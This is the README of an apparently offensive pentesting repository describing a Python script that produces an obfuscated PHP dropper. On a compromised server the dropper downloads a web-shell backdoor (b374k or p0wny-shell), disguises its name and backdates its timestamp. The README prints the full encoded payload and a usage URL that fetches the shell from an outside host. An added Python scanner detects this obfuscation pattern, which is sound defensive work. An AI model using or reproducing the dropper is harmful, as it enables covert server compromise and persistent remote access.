Pentesting-Tools

Pentesting tools.

phpPayloadObfuscate.py

By default, this script generates an obfuscated PHP payload (saved as out.php). When executed on a server, the payload downloads a b374k backdoor, saves it as obfuscated.php in the same directory, and sends a touch command to set the file's timestamp to 17-Aug-2021 10:23:42.

path= Where to save the backdoor (or any file you wish)

url= The URL of the backdoor (or any file you wish)

fname= The name it will be saved as on the server

In the following example, the URL of the uploaded payload (obfuscated.php) passes path as one directory above (../), url as the address of the p0wny-shell backdoor, and fname as innocent.php, the name the backdoor is saved as:

http://vulnerable.site/uploads/out.php?path=../&url=https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php&fname=innocent.php

Output example

For the default args, the output will look like this (saved as out.php):

<?php
$func="cr"."eat"."e_fun"."cti"."on";$obfus=$func('$x','ev'.'al'.'("?>".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');$obfus("bZBfa4MwFMXf/RRZEawwTe1WCq1rn7Y97mUvY4wS47UJVSPJtWOMffclsf9WJoie+7v35OTm6050QbjtGAryQMLN8+Pre+RU9LEMwl7X2blsla9WLWvgou61I7Ii4xtpDOB4sIzj74DYJzz4RymNlsFPALWBv2Tod+zSZDjp5OKls1FF1RvOEMrU5r+2PLYdxq9N3aVOllY4Q4HYmQWlmn2mW4miL3oDmqsWocWUq4YWjO9KpbRF1Aio6+RYSWppkDbMIOgBURuKFnfz+91/8YYjfQxHwuq4Av9ND7HdnmUNm5Ihs9D/bwE3h0zG3yNeBh50/SXwhrfkPG/bUPVcnJBBjQplA+PRJEteOCbTyTQjWbaYzBaz+Si2E8CFGo9yka2elC5kWUJ7k1Mr80L79031pFRthESwPZAOdGM3LFVLUBHGORhDUEhDSqmBo9JfxDFXsbvdg05H9pj16hc=");?>
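
A defender-side check for the pattern in the output above, as an added example that is not part of this repository: it joins concatenated string literals and reports decode-and-execute function names that become visible only after joining. The function and constant names, the constructed samples and the 40-character blob threshold are assumptions of this example.

```python
import re

# PHP concatenation seam between two string literals, e.g. "cr"."eat" or 'ev'.'al'
SEAM = re.compile(r"""["']\s*\.\s*["']""")
# Decode-and-execute functions that the sample output assembles from fragments
PRIMITIVES = ("create_function", "eval", "gzinflate", "base64_decode")
CHAIN = re.compile(r"gzinflate\s*\(\s*base64_decode\s*\(", re.I)
# Long base64-looking string literal (the 40-character threshold is an assumption)
BLOB = re.compile(r"""["'][A-Za-z0-9+/]{40,}={0,2}["']""")

def has_name(name, text):
    """True if the function name occurs as a whole word (PHP names ignore case)."""
    return re.search(rf"\b{name}\b", text, re.I) is not None

def scan_php(src):
    """Return heuristic findings for one PHP source string."""
    flat = SEAM.sub("", src)  # join adjacent literals so split names reappear
    hidden = [p for p in PRIMITIVES if has_name(p, flat) and not has_name(p, src)]
    chain = CHAIN.search(flat) is not None
    blob = BLOB.search(flat) is not None
    return {
        "hidden_primitives": hidden,  # names visible only after joining fragments
        "decode_chain": chain,        # gzinflate(base64_decode(...)) after joining
        "embedded_blob": blob,        # long base64-looking literal present
        "suspicious": bool(hidden) or (chain and blob),
    }

# Constructed samples. The first mirrors the structure of out.php with a dummy blob.
SAMPLE_OBFUSCATED = (
    '<?php $func="cr"."eat"."e_fun"."cti"."on";'
    "$obfus=$func('$x','ev'.'al'.'(\"?>\".gz'.'in'.'fla'.'te(ba'.'se'.'64'.'_de'.'co'.'de($x)));');"
    '$obfus("' + "QUJD" * 16 + '");?>'
)
SAMPLE_BENIGN = '<?php $msg = "Hello, " . $name . "!"; echo base64_decode($token); ?>'

if __name__ == "__main__":
    for label, src in (("obfuscated", SAMPLE_OBFUSCATED), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src))
```

A hit is a triage signal for files found in upload directories, not a verdict, since legitimate code occasionally concatenates string literals.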

Usage

python3.11 phpPayloadObfuscate.py

If you get the error:

TypeError: compress() takes at most 2 arguments (3 given)

You're not running on Python 3.11

Additional useful information

You can find useful information on how to make good use of this code here.

To do

Add more content to this repo.